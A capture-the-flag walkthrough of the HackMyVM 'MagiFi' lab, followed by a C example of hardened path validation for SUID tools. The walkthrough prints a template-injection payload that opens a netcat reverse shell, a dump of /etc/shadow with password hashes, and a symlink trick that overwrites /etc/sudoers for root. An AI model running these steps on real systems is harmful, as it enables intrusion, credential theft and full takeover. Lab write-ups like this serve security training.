HackMyVM-Magifi-Walkthrough
城南花已开

Information gathering

Service enumeration

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 (Unknown)
192.168.60.2 00:50:56:e3:f6:57 (Unknown)
192.168.60.181 08:00:27:f7:62:1f (Unknown)
192.168.60.254 00:50:56:e4:ae:23 (Unknown)

13 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.936 seconds (132.23 hosts/sec). 4 responded
export ip=192.168.60.181
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
RustScan: Because guessing isn't hacking.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.181:22
Open 192.168.60.181:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-12 17:39 CST
Initiating ARP Ping Scan at 17:39
Scanning 192.168.60.181 [1 port]
Completed ARP Ping Scan at 17:39, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:39
Completed Parallel DNS resolution of 1 host. at 17:39, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:39
Scanning 192.168.60.181 [2 ports]
Discovered open port 22/tcp on 192.168.60.181
Discovered open port 80/tcp on 192.168.60.181
Completed SYN Stealth Scan at 17:39, 0.05s elapsed (2 total ports)
Nmap scan report for 192.168.60.181
Host is up, received arp-response (0.00075s latency).
Scanned at 2025-02-12 17:39:11 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:F7:62:1F (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.37 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

Port 80 wants a hostname, so add one to the hosts file.

Borrowed from HTB?

sudo vim /etc/hosts
192.168.60.181 hogwarts.htb

Open it in the browser: there is a file upload right on the landing page.

When I tried uploading the template docx file the site provides, it returned an internal server error.

Possibly only PDF uploads are allowed.

I exported the docx to PDF and uploaded it again; this time it parsed successfully.

The content of the PDF is displayed back.

SSTI injection

I tried changing the PDF contents, and it looks like there is SSTI: template expressions in the text get evaluated.

So let's try executing a command:

{{ cycler.__init__.__globals__.os.popen('id').read() }}

This reveals the username harry_potter.

Now spawn a reverse shell directly:

{{ cycler.__init__.__globals__.os.popen('busybox nc 192.168.60.100 4444 -e sh').read() }}

Listen on the port:

❯ pwncat-cs -lp 4444
[18:02:15] Welcome to pwncat 🐈! __main__.py:164
[18:08:42] received connection from 192.168.60.181:55726 bind.py:84
[18:08:43] 0.0.0.0:4444: upgrading from /usr/bin/busybox to manager.py:957
/usr/bin/bash
192.168.60.181:55726: registered new host w/ db manager.py:957
(local) pwncat$
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$

The user turns out to have sudo privileges.

They all seem to be wireless-related.

User privilege escalation

Grab the user flag first:

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo -l
Matching Defaults entries for harry_potter on MagiFi:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User harry_potter may run the following commands on MagiFi:
(root) NOPASSWD: /usr/sbin/aireplay-ng, /usr/sbin/airmon-ng,
/usr/sbin/airodump-ng, /usr/bin/airdecap-ng, /usr/bin/hostapd-mana
(remote) harry_potter@MagiFi:/home/harry_potter$ cat user.txt
hogwarts{ea4bc74f09fb69771165e57b1b215de9}

The Aircrack-ng suite is used for Wi-Fi penetration testing, so let me look up its usage.

There is a bug here; call it a cheat.

hostapd-mana can print verbose debug information, and along the way it reads root.txt out for us.

It is readable even without -dd:

(remote) harry_potter@MagiFi:/home/harry_potter$ sudo hostapd-mana --help
hostapd-mana: invalid option -- '-'
hostapd-mana v2.6
User space daemon for IEEE 802.11 AP management,
IEEE 802.1X/WPA/WPA2/EAP/RADIUS Authenticator
Copyright (c) 2002-2016, Jouni Malinen <[email protected]> and contributors
--------------------------------------------------
MANA https://github.com/sensepost/hostapd-mana
By @singe ([email protected])
Original MANA EAP by Ian ([email protected])
Original karma patches by Robin Wood - [email protected]
Original EAP patches by Brad Antoniewicz @brad_anton
Sycophant by Michael Kruger @_cablethief
usage: hostapd [-hdBKtv] [-P <PID file>] [-e <entropy file>] \
[-g <global ctrl_iface>] [-G <group>]\
[-i <comma-separated list of interface names>]\
<configuration file(s)>

options:
-h show this usage
-d show more debug messages (-dd for even more)
-B run daemon in the background
-e entropy file
-g global control interface path
-G group for control interfaces
-P PID file
-K include key data in debug messages
-i list of interface names to use
-S start all the interfaces synchronously
-t include timestamps in some debug messages
-v show hostapd version

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ sudo hostapd-mana -dd /root/root.txt
random: Trying to read entropy from /dev/random
Configuration file: /root/root.txt
Line 1: invalid line 'hogwarts{5ed0818c0181fe97f744d7b1b51dd9c7}'
1 errors found in configuration file '/root/root.txt'
Failed to set up interface with /root/root.txt
hostapd_init: free iface 0x55be46caa340
Failed to initialize interface


Root privilege escalation

After more enumeration, tom.riddle's home directory contains a hidden image with the SUID bit set:

(remote) harry_potter@MagiFi:/home/tom.riddle$ ls -la
total 44
drwxr-xr-x 3 tom.riddle tom.riddle 4096 Feb 4 09:57 .
drwxr-xr-x 7 root root 4096 Sep 27 11:46 ..
lrwxrwxrwx 1 root root 9 Sep 27 10:21 .bash_history -> /dev/null
-rw-r--r-- 1 tom.riddle tom.riddle 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 tom.riddle tom.riddle 3771 Feb 25 2020 .bashrc
drwx------ 2 tom.riddle tom.riddle 4096 Feb 4 09:57 .cache
-rwsr-x--x 1 root tom.riddle 17136 Feb 12 10:19 .horcrux.png
-rw-r--r-- 1 tom.riddle tom.riddle 807 Feb 25 2020 .profile

When searching for SUID binaries, there is also a modified xxd:

/usr/bin/xxd_horcrux

(remote) harry_potter@MagiFi:/home/harry_potter$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/xxd_horcrux
/usr/bin/su
/usr/bin/fusermount
/usr/bin/at
/usr/bin/pkexec
/usr/bin/sudo
/usr/bin/mount
/usr/bin/passwd
/usr/bin/chsh
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/authbind/helper
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/snapd/23545/usr/lib/snapd/snap-confine
/snap/snapd/21759/usr/lib/snapd/snap-confine
/snap/core20/2434/usr/bin/chfn
/snap/core20/2434/usr/bin/chsh
/snap/core20/2434/usr/bin/gpasswd
/snap/core20/2434/usr/bin/mount
/snap/core20/2434/usr/bin/newgrp
/snap/core20/2434/usr/bin/passwd
/snap/core20/2434/usr/bin/su
/snap/core20/2434/usr/bin/sudo
/snap/core20/2434/usr/bin/umount
/snap/core20/2434/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2434/usr/lib/openssh/ssh-keysign
/snap/core20/2379/usr/bin/chfn
/snap/core20/2379/usr/bin/chsh
/snap/core20/2379/usr/bin/gpasswd
/snap/core20/2379/usr/bin/mount
/snap/core20/2379/usr/bin/newgrp
/snap/core20/2379/usr/bin/passwd
/snap/core20/2379/usr/bin/su
/snap/core20/2379/usr/bin/sudo
/snap/core20/2379/usr/bin/umount
/snap/core20/2379/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/2379/usr/lib/openssh/ssh-keysign
/home/tom.riddle/.horcrux.png

I tried using it to read .horcrux.png and got a hint:

(remote) harry_potter@MagiFi:/home/tom.riddle$ /usr/bin/xxd_horcrux -r .horcrux.png -O 1
Not every wizards can use or destroy a Horcrux!

Looking at the modified xxd, the binary itself is readable, so let's download it:

(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$ ls -al /usr/bin/xxd_horcrux
-rwsr-xr-x 1 root root 17264 Sep 25 12:22 /usr/bin/xxd_horcrux
(remote) harry_potter@MagiFi:/home/harry_potter/Hogwarts_web$
(local) pwncat$ download /usr/bin/xxd_horcrux
/usr/bin/xxd_horcrux ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100.0% • 17.3/17.3 KB • ? • 0:00:00
[13:38:48] downloaded 17.26KiB in 0.16 seconds

Decompile it with IDA Pro.

So why not just touch a .horcrux.png of our own?

Give it 777 permissions so everyone can read it.

Reading /etc/shadow works too:

(remote) harry_potter@MagiFi:/home/harry_potter$ touch .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ chmod 777 .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ /usr/bin/xxd_horcrux /etc/shadow -O .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ cat .horcrux.png |xxd -r
root:$6$KflwZsO6c4DW8laq$AVs2hfT9i1calD.V6aKIr5Wej26J1tjgSz5R674SSJDuWvX1RWqHYw79Q.OIqeIlhl0ksI7UJ7d0YHJp4F.J81:19993:0:99999:7:::
daemon:*:19430:0:99999:7:::
bin:*:19430:0:99999:7:::
sys:*:19430:0:99999:7:::
sync:*:19430:0:99999:7:::
games:*:19430:0:99999:7:::
man:*:19430:0:99999:7:::
lp:*:19430:0:99999:7:::
mail:*:19430:0:99999:7:::
news:*:19430:0:99999:7:::
uucp:*:19430:0:99999:7:::
proxy:*:19430:0:99999:7:::
www-data:*:19430:0:99999:7:::
backup:*:19430:0:99999:7:::
list:*:19430:0:99999:7:::
irc:*:19430:0:99999:7:::
gnats:*:19430:0:99999:7:::
nobody:*:19430:0:99999:7:::
systemd-network:*:19430:0:99999:7:::
systemd-resolve:*:19430:0:99999:7:::
systemd-timesync:*:19430:0:99999:7:::
messagebus:*:19430:0:99999:7:::
syslog:*:19430:0:99999:7:::
_apt:*:19430:0:99999:7:::
tss:*:19430:0:99999:7:::
uuidd:*:19430:0:99999:7:::
tcpdump:*:19430:0:99999:7:::
landscape:*:19430:0:99999:7:::
pollinate:*:19430:0:99999:7:::
fwupd-refresh:*:19430:0:99999:7:::
usbmux:*:19991:0:99999:7:::
sshd:*:19991:0:99999:7:::
systemd-coredump:!!:19991::::::
lxd:!:19991::::::
freerad:*:19991:0:99999:7:::
rubeus.hagrid:!:19991:0:99999:7:::
albus.dumbledore:!:19991:0:99999:7:::
minerva.mcgonagall:!:19991:0:99999:7:::
tom.riddle:$6$l2y72YLXF2tIL.rC$d3SQEKFlGu9wi/omLDmHJYGP3uRSD9t2hnRTqveIMOHG8pa80Ku81d3kbfXZy0bpC2PRp9xLqE7IQi3EQ4bf1/:19991:0:99999:7:::
harry_potter:$6$Cu5tGqfYYF/NWp6f$bLb5lfce4bMH10OYBG27nYBoMTMciI9NOxIR2XGliWIhzHE2iU0kS1ZKuSNPnYRS/y12jnt4jmr8pMfDsRicK1:19993:0:99999:7:::

But I think the intended path is to switch to the tom.riddle user and use the modified xxd to read the .horcrux.png in tom.riddle's home directory.

Presumably the challenge author did not anticipate this; the code is not strict enough and only checks the filename.

That means root's flag can be read as well.

To go one step further and get a root shell, we can write a sudoers entry:

(remote) harry_potter@MagiFi:/tmp$ echo "harry_potter  ALL=(ALL) NOPASSWD: ALL">aa
(remote) harry_potter@MagiFi:/tmp$ cat aa |xxd >123
(remote) harry_potter@MagiFi:/tmp$ cat 123
00000000: 6861 7272 795f 706f 7474 6572 2020 414c harry_potter AL
00000010: 4c3d 2841 4c4c 2920 4e4f 5041 5353 5744 L=(ALL) NOPASSWD
00000020: 3a20 414c 4c0a : ALL.

With this file 123 in hand, use the modified xxd's -r (reverse) operation to write it out to .horcrux.png.

Since .horcrux.png can be made a symlink to /etc/sudoers,

the write then goes through:

(remote) harry_potter@MagiFi:/home/harry_potter$ rm .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ ln -s /etc/sudoers .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ ls -al
total 32
drwxr-xr-x 4 harry_potter harry_potter 4096 Feb 13 06:12 .
drwxr-xr-x 7 root root 4096 Sep 27 11:46 ..
lrwxrwxrwx 1 root root 9 Sep 27 11:45 .bash_history -> /dev/null
-rw-r--r-- 1 harry_potter harry_potter 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 harry_potter harry_potter 3771 Feb 25 2020 .bashrc
drwxr-xr-x 5 harry_potter harry_potter 4096 Sep 26 13:06 Hogwarts_web
lrwxrwxrwx 1 harry_potter harry_potter 12 Feb 13 06:12 .horcrux.png -> /etc/sudoers
-rw-r--r-- 1 harry_potter harry_potter 807 Feb 25 2020 .profile
drwx------ 3 harry_potter harry_potter 4096 Feb 12 10:24 snap
-rw-r--r-- 1 harry_potter harry_potter 43 Feb 4 10:04 user.txt
Hogwarts_web snap user.txt
(remote) harry_potter@MagiFi:/home/harry_potter$ /usr/bin/xxd_horcrux -r /tmp/123 -O .horcrux.png
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo -l
User harry_potter may run the following commands on MagiFi:
(ALL) NOPASSWD: ALL
(remote) harry_potter@MagiFi:/home/harry_potter$ sudo su
root@MagiFi:/home/harry_potter# id
uid=0(root) gid=0(root) groups=0(root)
root@MagiFi:/home/harry_potter# cd ~
root@MagiFi:~# cat root.txt
hogwarts{5ed0818c0181fe97f744d7b1b51dd9c7}
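The defect used twice above (reading /etc/shadow through a freshly created .horcrux.png, then writing sudoers through a symlink) comes down to how xxd_horcrux validates the path it is given. The C below is an added example written for this page, not the challenge binary's source: it places the name-only check next to the validation a SUID tool should perform before it opens a user-supplied path as root. The enum and function names and the scratch-directory fixture are assumptions of this example.

```c
/* Added example: validating a user-named target in a SUID-root tool.
 * Not the source of xxd_horcrux; names and fixture are illustrative. */
#define _DEFAULT_SOURCE
#include <fcntl.h>
#include <libgen.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

enum target_verdict {
    TARGET_OK = 0,
    TARGET_BAD_NAME,    /* basename is not the one authorised file name */
    TARGET_IS_SYMLINK,  /* lstat() reports a symlink: refuse, never follow it */
    TARGET_NOT_REGULAR, /* directory, device, fifo, ... */
    TARGET_WRONG_OWNER, /* owned by someone other than the expected uid */
    TARGET_NOT_FOUND
};

/* The weak policy seen in the walkthrough: only the file name is inspected,
 * so any path ending in .horcrux.png passes, a symlink included. */
int name_only_check(const char *path)
{
    char *copy = strdup(path);   /* basename() may modify its argument */
    if (copy == NULL)
        return 0;
    int ok = strcmp(basename(copy), ".horcrux.png") == 0;
    free(copy);
    return ok;
}

/* Hardened policy: the name AND the inode. lstat() reports a symlink as a
 * symlink rather than as its target, so a link to /etc/sudoers is rejected
 * before any privileged open() takes place. */
enum target_verdict check_target(const char *path, uid_t expected_owner)
{
    struct stat st;
    if (!name_only_check(path))
        return TARGET_BAD_NAME;
    if (lstat(path, &st) != 0)
        return TARGET_NOT_FOUND;
    if (S_ISLNK(st.st_mode))
        return TARGET_IS_SYMLINK;
    if (!S_ISREG(st.st_mode))
        return TARGET_NOT_REGULAR;
    if (st.st_uid != expected_owner)
        return TARGET_WRONG_OWNER;
    return TARGET_OK;
}

/* Open only after the policy passes. O_NOFOLLOW makes the kernel refuse a
 * link swapped in between the check and the open, and fstat() on the
 * descriptor re-verifies the inode that was actually opened. fd or -1. */
int open_target_for_write(const char *path, uid_t expected_owner)
{
    struct stat st;
    if (check_target(path, expected_owner) != TARGET_OK)
        return -1;
    int fd = open(path, O_WRONLY | O_NOFOLLOW | O_CLOEXEC);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != expected_owner) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Constructed fixture: a scratch directory with a genuine .horcrux.png owned
 * by the caller and a second .horcrux.png that is a symlink to a stand-in
 * for /etc/sudoers. Returns a bitmask: 1 = name-only check accepts the
 * symlink (the defect), 2 = hardened check rejects it, 4 = hardened check
 * accepts the real file, 8 = open refuses the symlink. Correct run: 15. */
int run_demo(void)
{
    char dir[] = "/tmp/horcrux-demo-XXXXXX";
    char real[4096], linkdir[4096], lnk[4096], decoy[4096];
    int fd, mask = 0;

    if (mkdtemp(dir) == NULL)
        return -1;
    snprintf(real, sizeof real, "%s/.horcrux.png", dir);
    snprintf(linkdir, sizeof linkdir, "%s/other", dir);
    snprintf(lnk, sizeof lnk, "%s/other/.horcrux.png", dir);
    snprintf(decoy, sizeof decoy, "%s/sudoers-stand-in", dir);
    fd = open(real, O_WRONLY | O_CREAT, 0600);  if (fd >= 0) close(fd);
    fd = open(decoy, O_WRONLY | O_CREAT, 0600); if (fd >= 0) close(fd);
    mkdir(linkdir, 0700);
    symlink(decoy, lnk);

    if (name_only_check(lnk))                              mask |= 1;
    if (check_target(lnk, getuid()) == TARGET_IS_SYMLINK)  mask |= 2;
    if (check_target(real, getuid()) == TARGET_OK)         mask |= 4;
    fd = open_target_for_write(lnk, getuid());
    if (fd == -1) mask |= 8; else close(fd);

    unlink(lnk); unlink(decoy); unlink(real);
    rmdir(linkdir); rmdir(dir);
    return mask;
}

int main(void)
{
    int mask = run_demo();
    printf("demo mask = %d (15 means every check behaved)\n", mask);
    return mask == 15 ? 0 : 1;
}
```

Compile with gcc and run; it prints 15 when every check behaves. The same validation belongs on the input path too, since the walkthrough also fed /etc/shadow to the binary as root. Simpler still, a tool like this can drop to the real uid with setresuid() before opening any user-supplied path, so the kernel's ordinary permission checks decide instead of a filename comparison.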

By this point the Aircrack-ng suite has not been used at all, so this doesn't feel like the intended solution either.
